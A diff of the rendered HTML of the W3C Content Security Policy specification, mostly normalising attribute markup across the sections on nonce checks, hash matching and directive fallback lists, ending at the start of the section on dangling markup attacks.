@@ -4955,29 +4963,29 @@ directive-value = <a data-link-type="grammar" href="https://tools.ietf.org/html/
   in <a href="#security-nonce-hijacking">§7.2 Nonce Hijacking</a>), and "<code>Not Nonceable</code>" if such expressions
   should not be applied.</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>If <var>element</var> does not have an attribute named "<code>nonce</code>", return "<code>Not Nonceable</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>element</var> is a <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/scripting.html#script" id="ref-for-script⑥">script</a></code> element, then for each <var>attribute</var> in <var>element</var>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>If <var>attribute</var>’s name is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive①⑧">ASCII case-insensitive</a> match for
   the string "<code>&lt;script</code>" or the string
   "<code>&lt;style</code>", return "<code>Not Nonceable</code>".</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>attribute</var>’s value contains an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive①⑨">ASCII case-insensitive</a> match
   the string "<code>&lt;script</code>" or the string
   "<code>&lt;style</code>", return "<code>Not Nonceable</code>".</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>If <var>element</var> had a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/parsing.html#parse-error-duplicate-attribute" id="ref-for-parse-error-duplicate-attribute">duplicate-attribute</a> <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-script-parse-error" id="ref-for-concept-script-parse-error">parse error</a> during tokenization, return
   "<code>Not Nonceable</code>".</p>
-      <p class="issue" id="issue-820579ab"><a class="self-link" href="#issue-820579ab"></a> We need some sort of hook in HTML to record this error if we’re
+      <p class="issue" id="issue-e2d81ee7"><a class="self-link" href="#issue-e2d81ee7"></a> We need some sort of hook in HTML to record this error if we’re
   planning on using it here. <a href="https://github.com/whatwg/html/issues/3257">&lt;https://github.com/whatwg/html/issues/3257></a></p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Nonceable</code>".</p>
     </ol>
-    <p class="issue" id="issue-4592ac7e"><a class="self-link" href="#issue-4592ac7e"></a> This processing is meant to mitigate the risk
+    <p class="issue" id="issue-c41e2850"><a class="self-link" href="#issue-c41e2850"></a> This processing is meant to mitigate the risk
   of dangling markup attacks that steal the nonce from an existing element
   in order to load injected script. It is fairly expensive, however, as it
   requires that we walk through all attributes and their values in order to
@@ -4986,34 +4994,34 @@ directive-value = <a data-link-type="grammar" href="https://tools.ietf.org/html/
   present, but we should probably consider this algorithm as "at risk" until
   we know its impact. <a href="https://github.com/w3c/webappsec-csp/issues/98">&lt;https://github.com/w3c/webappsec-csp/issues/98></a></p>
     <h5 class="heading settled algorithm" data-algorithm="Does a source list allow all inline behavior for type?" data-level="6.6.3.2" id="allow-all-inline"><span class="secno">6.6.3.2. </span><span class="content"> Does a source list allow all inline behavior for <var>type</var>? </span><a class="self-link" href="#allow-all-inline"></a></h5>
-    <p>A <a data-link-type="dfn" href="#source-lists" id="ref-for-source-lists①⑥">source list</a> <dfn class="dfn-paneled" data-dfn-for="source list" data-dfn-type="dfn" data-export data-local-lt="allow all inline behavior" id="source-list-allows-all-inline-behavior">allows all inline behavior</dfn> of a given <var>type</var> if it contains the <a data-link-type="grammar" href="#grammardef-keyword-source" id="ref-for-grammardef-keyword-source④"><code>keyword-source</code></a> expression <a data-link-type="grammar" href="#grammardef-unsafe-inline" id="ref-for-grammardef-unsafe-inline①"><code>'unsafe-inline'</code></a>, and does not override that
+    <p>A <a data-link-type="dfn" href="#source-lists" id="ref-for-source-lists①⑥">source list</a> <dfn class="dfn-paneled" data-dfn-for="source list" data-dfn-type="dfn" data-export="" data-local-lt="allow all inline behavior" id="source-list-allows-all-inline-behavior">allows all inline behavior</dfn> of a given <var>type</var> if it contains the <a data-link-type="grammar" href="#grammardef-keyword-source" id="ref-for-grammardef-keyword-source④"><code>keyword-source</code></a> expression <a data-link-type="grammar" href="#grammardef-unsafe-inline" id="ref-for-grammardef-unsafe-inline①"><code>'unsafe-inline'</code></a>, and does not override that
   expression as described in the following algorithm:</p>
     <p>Given a <a data-link-type="dfn" href="#source-lists" id="ref-for-source-lists①⑦">source list</a> (<var>list</var>) and a string (<var>type</var>), the following
   algorithm returns "<code>Allows</code>" if all inline content of a given <var>type</var> is
   allowed and "<code>Does Not Allow</code>" otherwise.</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>allow all inline</var> be <code>false</code>.</p>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>expression</var> in <var>list</var>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>If <var>expression</var> matches the <a data-link-type="grammar" href="#grammardef-nonce-source" id="ref-for-grammardef-nonce-source⑥"><code>nonce-source</code></a> or <a data-link-type="grammar" href="#grammardef-hash-source" id="ref-for-grammardef-hash-source⑥"><code>hash-source</code></a> grammar, return "<code>Does Not Allow</code>".</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>type</var> is "<code>script</code>", "<code>script attribute</code>" or "<code>navigation</code>"
   and <var>expression</var> matches the <a data-link-type="grammar" href="#grammardef-keyword-source" id="ref-for-grammardef-keyword-source⑤">keyword-source</a> "<a data-link-type="grammar" href="#grammardef-strict-dynamic" id="ref-for-grammardef-strict-dynamic③"><code>'strict-dynamic'</code></a>", return "<code>Does Not Allow</code>".</p>
         <p class="note" role="note"><span>Note:</span> <code>'strict-dynamic'</code> only applies to scripts, not other resource
   types. Usage is explained in more detail in <a href="#strict-dynamic-usage">§8.2 Usage of "'strict-dynamic'"</a>.</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>expression</var> is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive②⓪">ASCII case-insensitive</a> match for the <a data-link-type="grammar" href="#grammardef-keyword-source" id="ref-for-grammardef-keyword-source⑥"><code>keyword-source</code></a> "<a data-link-type="grammar" href="#grammardef-unsafe-inline" id="ref-for-grammardef-unsafe-inline②"><code>'unsafe-inline'</code></a>",
   set <var>allow all inline</var> to <code>true</code>.</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>If <var>allow all inline</var> is <code>true</code>, return "<code>Allows</code>".
   Otherwise, return "<code>Does Not Allow</code>".</p>
     </ol>
-    <div class="example" id="example-c6b777a0">
-     <a class="self-link" href="#example-c6b777a0"></a> <a data-link-type="dfn" href="#source-lists" id="ref-for-source-lists①⑧">Source lists</a> that <a data-link-type="dfn" href="#source-list-allows-all-inline-behavior" id="ref-for-source-list-allows-all-inline-behavior">allow all inline behavior</a>: 
+    <div class="example" id="example-da6a7e8f">
+     <a class="self-link" href="#example-da6a7e8f"></a> <a data-link-type="dfn" href="#source-lists" id="ref-for-source-lists①⑧">Source lists</a> that <a data-link-type="dfn" href="#source-list-allows-all-inline-behavior" id="ref-for-source-list-allows-all-inline-behavior">allow all inline behavior</a>: 
 <pre>'unsafe-inline' http://a.com http://b.com
 'unsafe-inline'
 </pre>
@@ -5036,63 +5044,63 @@ http://example.com 'strict-dynamic' 'unsafe-inline'
     <p class="note" role="note"><span>Note:</span> Regardless of the encoding of the document, <var>source</var> will be converted
   to <code>UTF-8</code> before applying any hashing algorithms.</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>If <a href="#allow-all-inline">§6.6.3.2 Does a source list allow all inline behavior for type?</a> returns "<code>Allows</code>" given <var>list</var> and <var>type</var>,
   return "<code>Matches</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>type</var> is "<code>script</code>" or "<code>style</code>", and <a href="#is-element-nonceable">§6.6.3.1 Is element nonceable?</a> returns "<code>Nonceable</code>" when executed upon <var>element</var>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>For each <var>expression</var> in <var>list</var>:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>If <var>expression</var> matches the <a data-link-type="grammar" href="#grammardef-nonce-source" id="ref-for-grammardef-nonce-source⑦"><code>nonce-source</code></a> grammar,
-  and <var>element</var> has a <code><a data-link-type="element-sub" href="https://html.spec.whatwg.org/multipage/urls-and-fetching.html#attr-nonce" id="ref-for-attr-nonce">nonce</a></code> attribute whose value is a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/infrastructure.html#case-sensitive" id="ref-for-case-sensitive⑤">case-sensitive</a> match for <var>expression</var>’s <a data-link-type="grammar" href="#grammardef-base64-value" id="ref-for-grammardef-base64-value⑥"><code>base64-value</code></a> part, return "<code>Matches</code>".</p>
+  and <var>element</var> has a <code><a data-link-type="element-sub">nonce</a></code> attribute whose value is a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/infrastructure.html#case-sensitive" id="ref-for-case-sensitive⑤">case-sensitive</a> match for <var>expression</var>’s <a data-link-type="grammar" href="#grammardef-base64-value" id="ref-for-grammardef-base64-value⑥"><code>base64-value</code></a> part, return "<code>Matches</code>".</p>
         </ol>
       </ol>
       <p class="note" role="note"><span>Note:</span> Nonces only apply to inline <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/scripting.html#script" id="ref-for-script⑧">script</a></code> and inline <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/semantics.html#the-style-element" id="ref-for-the-style-element①">style</a></code>, not to
   attributes of either element or to <code>javascript:</code> navigations.</p>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>unsafe-hashes flag</var> be <code>false</code>.</p>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>expression</var> in <var>list</var>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>If <var>expression</var> is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive②①">ASCII case-insensitive</a> match for the <a data-link-type="grammar" href="#grammardef-keyword-source" id="ref-for-grammardef-keyword-source⑦"><code>keyword-source</code></a> "<a data-link-type="grammar" href="#grammardef-unsafe-hashes" id="ref-for-grammardef-unsafe-hashes"><code>'unsafe-hashes'</code></a>",
   set <var>unsafe-hashes flag</var> to <code>true</code>. Break out of the loop.</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>If <var>type</var> is "<code>script</code>" or "<code>style</code>", or <var>unsafe-hashes flag</var> is <code>true</code>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>Set <var>source</var> to the result of executing <a data-link-type="dfn" href="https://encoding.spec.whatwg.org/#utf-8-encode" id="ref-for-utf-8-encode">UTF-8 encode</a> on the result of executing <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#javascript-string-convert" id="ref-for-javascript-string-convert">JavaScript string converting</a> on <var>source</var>.</p>
-       <li data-md>
+       <li data-md="">
         <p>For each <var>expression</var> in <var>list</var>:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>If <var>expression</var> matches the <a data-link-type="grammar" href="#grammardef-hash-source" id="ref-for-grammardef-hash-source⑦"><code>hash-source</code></a> grammar:</p>
           <ol>
-           <li data-md>
+           <li data-md="">
             <p>Let <var>algorithm</var> be <code>null</code>.</p>
-           <li data-md>
-            <p>If <var>expression</var>’s <a data-link-type="grammar" href="#grammardef-hash-algorithm" id="ref-for-grammardef-hash-algorithm②"><code>hash-algorithm</code></a> part is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive②②">ASCII case-insensitive</a> match for "sha256", set <var>algorithm</var> to <a data-link-type="dfn" href="https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf#" id="termref-for-①">SHA-256</a>.</p>
-           <li data-md>
-            <p>If <var>expression</var>’s <a data-link-type="grammar" href="#grammardef-hash-algorithm" id="ref-for-grammardef-hash-algorithm③"><code>hash-algorithm</code></a> part is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive②③">ASCII case-insensitive</a> match for "sha384", set <var>algorithm</var> to <a data-link-type="dfn" href="https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf#" id="termref-for-②">SHA-384</a>.</p>
-           <li data-md>
-            <p>If <var>expression</var>’s <a data-link-type="grammar" href="#grammardef-hash-algorithm" id="ref-for-grammardef-hash-algorithm④"><code>hash-algorithm</code></a> part is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive②④">ASCII case-insensitive</a> match for "sha512", set <var>algorithm</var> to <a data-link-type="dfn" href="https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf#" id="termref-for-③">SHA-512</a>.</p>
-           <li data-md>
+           <li data-md="">
+            <p>If <var>expression</var>’s <a data-link-type="grammar" href="#grammardef-hash-algorithm" id="ref-for-grammardef-hash-algorithm②"><code>hash-algorithm</code></a> part is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive②②">ASCII case-insensitive</a> match for "sha256", set <var>algorithm</var> to <a data-link-type="dfn" href="https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf#">SHA-256</a>.</p>
+           <li data-md="">
+            <p>If <var>expression</var>’s <a data-link-type="grammar" href="#grammardef-hash-algorithm" id="ref-for-grammardef-hash-algorithm③"><code>hash-algorithm</code></a> part is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive②③">ASCII case-insensitive</a> match for "sha384", set <var>algorithm</var> to <a data-link-type="dfn" href="https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf#">SHA-384</a>.</p>
+           <li data-md="">
+            <p>If <var>expression</var>’s <a data-link-type="grammar" href="#grammardef-hash-algorithm" id="ref-for-grammardef-hash-algorithm④"><code>hash-algorithm</code></a> part is an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive②④">ASCII case-insensitive</a> match for "sha512", set <var>algorithm</var> to <a data-link-type="dfn" href="https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf#">SHA-512</a>.</p>
+           <li data-md="">
             <p>If <var>algorithm</var> is not <code>null</code>:</p>
             <ol>
-             <li data-md>
+             <li data-md="">
               <p>Let <var>actual</var> be the result of <a data-link-type="dfn" href="https://tools.ietf.org/html/rfc4648#section-4" id="ref-for-section-4①">base64 encoding</a> the
   result of applying <var>algorithm</var> to <var>source</var>.</p>
-             <li data-md>
+             <li data-md="">
               <p>Let <var>expected</var> be <var>expression</var>’s <a data-link-type="grammar" href="#grammardef-base64-value" id="ref-for-grammardef-base64-value⑦"><code>base64-value</code></a> part,
   with all '<code>-</code>' characters replaced with '<code>+</code>', and all '<code>_</code>' characters
   replaced with '<code>/</code>'.</p>
               <p class="note" role="note"><span>Note:</span> This replacement normalizes hashes expressed in <a data-link-type="dfn" href="https://tools.ietf.org/html/rfc4648#section-5" id="ref-for-section-5①">base64url
   encoding</a> into <a data-link-type="dfn" href="https://tools.ietf.org/html/rfc4648#section-4" id="ref-for-section-4②">base64 encoding</a> for matching.</p>
-             <li data-md>
+             <li data-md="">
               <p>If <var>actual</var> is a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/infrastructure.html#case-sensitive" id="ref-for-case-sensitive⑥">case-sensitive</a> match for <var>expected</var>, return
   "<code>Matches</code>".</p>
             </ol>
@@ -5102,85 +5110,85 @@ http://example.com 'strict-dynamic' 'unsafe-inline'
       <p class="note" role="note"><span>Note:</span> Hashes apply to inline <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/scripting.html#script" id="ref-for-script⑨">script</a></code> and inline <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/semantics.html#the-style-element" id="ref-for-the-style-element②">style</a></code>. If the
   "<a data-link-type="grammar" href="#grammardef-unsafe-hashes" id="ref-for-grammardef-unsafe-hashes①"><code>'unsafe-hashes'</code></a>" source expression is present,
   they will also apply to event handlers, style attributes and <code>javascript:</code> navigations.</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Does Not Match</code>".</p>
     </ol>
     <h3 class="heading settled" data-level="6.7" id="directive-algorithms"><span class="secno">6.7. </span><span class="content">Directive Algorithms</span><a class="self-link" href="#directive-algorithms"></a></h3>
     <h4 class="heading settled algorithm" data-algorithm="Get the effective directive for request" data-level="6.7.1" id="effective-directive-for-a-request"><span class="secno">6.7.1. </span><span class="content"> Get the effective directive for <var>request</var> </span><a class="self-link" href="#effective-directive-for-a-request"></a></h4>
     <p>Each <a data-link-type="dfn" href="#fetch-directives" id="ref-for-fetch-directives②">fetch directive</a> controls a specific destination of <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request⑥⑦">request</a>. Given
-  a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request⑥⑧">request</a> (<var>request</var>), the following algorithm returns either <code>null</code> or the <a data-link-type="dfn" href="#directive-name" id="ref-for-directive-name①④">name</a> of the request’s <dfn class="dfn-paneled" data-dfn-for="request" data-dfn-type="dfn" data-export id="request-effective-directive">effective directive</dfn>:</p>
+  a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request⑥⑧">request</a> (<var>request</var>), the following algorithm returns either <code>null</code> or the <a data-link-type="dfn" href="#directive-name" id="ref-for-directive-name①④">name</a> of the request’s <dfn class="dfn-paneled" data-dfn-for="request" data-dfn-type="dfn" data-export="" id="request-effective-directive">effective directive</dfn>:</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>If <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-initiator" id="ref-for-concept-request-initiator①">initiator</a> is "<code>fetch</code>" or its <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-destination" id="ref-for-concept-request-destination⑧">destination</a> is "", return <code>connect-src</code>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-initiator" id="ref-for-concept-request-initiator②">initiator</a> is "<code>prefetch</code>" or "<code>prerender</code>",
   return <code>prefetch-src</code>.</p>
-     <li data-md>
+     <li data-md="">
       <p>Switch on <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-destination" id="ref-for-concept-request-destination⑨">destination</a>, and execute
   the associated steps:</p>
       <dl>
-       <dt data-md>"<code>manifest</code>"
-       <dd data-md>
+       <dt data-md="">"<code>manifest</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>manifest-src</code>.</p>
         </ol>
-       <dt data-md>"<code>object</code>"
-       <dt data-md>"<code>embed</code>"
-       <dd data-md>
+       <dt data-md="">"<code>object</code>"
+       <dt data-md="">"<code>embed</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>object-src</code>.</p>
         </ol>
-       <dt data-md>"<code>document</code>"
-       <dd data-md>
+       <dt data-md="">"<code>document</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>If the <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-target-browsing-context" id="ref-for-concept-request-target-browsing-context①">target browsing context</a> is a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsers.html#nested-browsing-context" id="ref-for-nested-browsing-context⑦">nested browsing context</a>, return <code>frame-src</code>.</p>
         </ol>
-       <dt data-md>"<code>audio</code>"
-       <dt data-md>"<code>track</code>"
-       <dt data-md>"<code>video</code>"
-       <dd data-md>
+       <dt data-md="">"<code>audio</code>"
+       <dt data-md="">"<code>track</code>"
+       <dt data-md="">"<code>video</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>media-src</code>.</p>
         </ol>
-       <dt data-md>"<code>font</code>"
-       <dd data-md>
+       <dt data-md="">"<code>font</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>font-src</code>.</p>
         </ol>
-       <dt data-md>"<code>image</code>"
-       <dd data-md>
+       <dt data-md="">"<code>image</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>img-src</code>.</p>
         </ol>
-       <dt data-md>"<code>style</code>"
-       <dd data-md>
+       <dt data-md="">"<code>style</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>style-src-elem</code>.</p>
         </ol>
-       <dt data-md>"<code>script</code>"
-       <dt data-md>"<code>xslt</code>"
-       <dd data-md>
+       <dt data-md="">"<code>script</code>"
+       <dt data-md="">"<code>xslt</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>script-src-elem</code>.</p>
         </ol>
-       <dt data-md>"<code>serviceworker</code>"
-       <dt data-md>"<code>sharedworker</code>"
-       <dt data-md>"<code>worker</code>"
-       <dd data-md>
+       <dt data-md="">"<code>serviceworker</code>"
+       <dt data-md="">"<code>sharedworker</code>"
+       <dt data-md="">"<code>worker</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>worker-src</code>.</p>
         </ol>
       </dl>
-     <li data-md>
+     <li data-md="">
       <p>Return <code>null</code>.</p>
     </ol>
     <h4 class="heading settled algorithm" data-algorithm="Get the effective directive for inline checks" data-level="6.7.2" id="effective-directive-for-inline-check"><span class="secno">6.7.2. </span><span class="content"> Get the effective directive for inline checks </span><a class="self-link" href="#effective-directive-for-inline-check"></a></h4>
@@ -5188,36 +5196,36 @@ http://example.com 'strict-dynamic' 'unsafe-inline'
     <p class="note" role="note"><span>Note:</span> While the <a data-link-type="dfn" href="#request-effective-directive" id="ref-for-request-effective-directive">effective directive</a> is only defined for <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request⑥⑨">requests</a>, in this algorithm it is used similarly to mean
   the directive that is most relevant to a particular type of inline check.</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Switch on <var>type</var>:</p>
       <dl>
-       <dt data-md>"<code>script</code>"
-       <dt data-md>"<code>navigation</code>"
-       <dd data-md>
+       <dt data-md="">"<code>script</code>"
+       <dt data-md="">"<code>navigation</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>script-src-elem</code>.</p>
         </ol>
-       <dt data-md>"<code>script attribute</code>"
-       <dd data-md>
+       <dt data-md="">"<code>script attribute</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>script-src-attr</code>.</p>
         </ol>
-       <dt data-md>"<code>style</code>"
-       <dd data-md>
+       <dt data-md="">"<code>style</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>style-src-elem</code>.</p>
         </ol>
-       <dt data-md>"<code>style attribute</code>"
-       <dd data-md>
+       <dt data-md="">"<code>style attribute</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>style-src-attr</code>.</p>
         </ol>
       </dl>
-     <li data-md>
+     <li data-md="">
       <p>Return <code>null</code>.</p>
     </ol>
     <h4 class="heading settled algorithm" data-algorithm="Get fetch directive fallback list" data-level="6.7.3" id="directive-fallback-list"><span class="secno">6.7.3. </span><span class="content"> Get fetch directive fallback list </span><a class="self-link" href="#directive-fallback-list"></a></h4>
@@ -5226,89 +5234,89 @@ http://example.com 'strict-dynamic' 'unsafe-inline'
   and it includes the effective directive itself.</p>
     <p>Given a string (<var>directive name</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Switch on <var>directive name</var>:</p>
       <dl>
-       <dt data-md>"<code>script-src-elem</code>"
-       <dd data-md>
+       <dt data-md="">"<code>script-src-elem</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>&lt;&lt; "script-src-elem", "script-src", "default-src" >></code>.</p>
         </ol>
-       <dt data-md>"<code>script-src-attr</code>"
-       <dd data-md>
+       <dt data-md="">"<code>script-src-attr</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>&lt;&lt; "script-src-attr", "script-src", "default-src" >></code>.</p>
         </ol>
-       <dt data-md>"<code>style-src-elem</code>"
-       <dd data-md>
+       <dt data-md="">"<code>style-src-elem</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>&lt;&lt; "style-src-elem", "style-src", "default-src" >></code>.</p>
         </ol>
-       <dt data-md>"<code>style-src-attr</code>"
-       <dd data-md>
+       <dt data-md="">"<code>style-src-attr</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>&lt;&lt; "style-src-attr", "style-src", "default-src" >></code>.</p>
         </ol>
-       <dt data-md>"<code>worker-src</code>"
-       <dd data-md>
+       <dt data-md="">"<code>worker-src</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>&lt;&lt; "worker-src", "child-src", "script-src", "default-src" >></code>.</p>
         </ol>
-       <dt data-md>"<code>connect-src</code>"
-       <dd data-md>
+       <dt data-md="">"<code>connect-src</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>&lt;&lt; "connect-src", "default-src" >></code>.</p>
         </ol>
-       <dt data-md>"<code>manifest-src</code>"
-       <dd data-md>
+       <dt data-md="">"<code>manifest-src</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>&lt;&lt; "manifest-src", "default-src" >></code>.</p>
         </ol>
-       <dt data-md>"<code>prefetch-src</code>"
-       <dd data-md>
+       <dt data-md="">"<code>prefetch-src</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>&lt;&lt; "prefetch-src", "default-src" >></code>.</p>
         </ol>
-       <dt data-md>"<code>object-src</code>"
-       <dd data-md>
+       <dt data-md="">"<code>object-src</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>&lt;&lt; "object-src", "default-src" >></code>.</p>
         </ol>
-       <dt data-md>"<code>frame-src</code>"
-       <dd data-md>
+       <dt data-md="">"<code>frame-src</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>&lt;&lt; "frame-src", "child-src", "default-src" >></code>.</p>
         </ol>
-       <dt data-md>"<code>media-src</code>"
-       <dd data-md>
+       <dt data-md="">"<code>media-src</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>&lt;&lt; "media-src", "default-src" >></code>.</p>
         </ol>
-       <dt data-md>"<code>font-src</code>"
-       <dd data-md>
+       <dt data-md="">"<code>font-src</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>&lt;&lt; "font-src", "default-src" >></code>.</p>
         </ol>
-       <dt data-md>"<code>img-src</code>"
-       <dd data-md>
+       <dt data-md="">"<code>img-src</code>"
+       <dd data-md="">
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Return <code>&lt;&lt; "img-src", "default-src" >></code>.</p>
         </ol>
       </dl>
-     <li data-md>
+     <li data-md="">
       <p>Return <code>&lt;&lt; >></code>.</p>
     </ol>
     <h4 class="heading settled algorithm" data-algorithm="Should fetch directive execute" data-level="6.7.4" id="should-directive-execute"><span class="secno">6.7.4. </span><span class="content"> Should fetch directive execute </span><a class="self-link" href="#should-directive-execute"></a></h4>
@@ -5320,17 +5328,17 @@ http://example.com 'strict-dynamic' 'unsafe-inline'
     <p>Given a string (<var>effective directive name</var>), a string (<var>directive name</var>) and
   a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑧②">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>directive fallback list</var> be the result of executing <a href="#directive-fallback-list">§6.7.3 Get fetch directive fallback list</a> on <var>effective directive name</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>fallback directive</var> in <var>directive fallback list</var>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>If <var>directive name</var> is <var>fallback directive</var>, Return "<code>Yes</code>".</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>policy</var> contains a directive whose <a data-link-type="dfn" href="#directive-name" id="ref-for-directive-name①⑥">name</a> is <var>fallback directive</var>,  Return "<code>No</code>".</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>No</code>".</p>
     </ol>
    </section>
@@ -5356,13 +5364,13 @@ http://example.com 'strict-dynamic' 'unsafe-inline'
     <h4 class="heading settled" data-level="7.2.1" id="dangling-markup-attacks"><span class="secno">7.2.1. </span><span class="content">Dangling markup attacks</span><a class="self-link" href="#dangling-markup-attacks"></a></h4>
     <p>Dangling markup attacks such as those discussed in <a data-link-type="biblio" href="#biblio-filedescriptor-2015">[FILEDESCRIPTOR-2015]</a> can be used to repurpose a page’s legitimate nonces for injections. For
   example, given an injection point before a <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/scripting.html#script" id="ref-for-script①⓪">script</a></code> element:</p>
